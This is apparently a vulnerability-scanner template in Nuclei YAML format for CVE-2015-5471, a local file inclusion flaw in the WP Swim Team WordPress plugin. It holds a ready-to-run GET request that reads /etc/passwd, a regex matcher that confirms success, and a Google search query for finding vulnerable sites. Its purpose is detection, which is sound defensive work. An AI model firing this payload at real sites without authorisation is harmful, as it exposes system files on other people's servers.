41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: CVE-2015-5471
|
|
|
|
info:
|
|
name: Swim Team <= v1.44.10777 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
|
|
- http://www.vapid.dhs.org/advisory.php?v=134
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
|
|
- http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
|
|
remediation: Upgrade to Swim Team version 1.45 or newer.
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2015-5471
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
google-query: inurl:"/wp-content/plugins/wp-swimteam"
|
|
tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by cs on 2022/02/25
|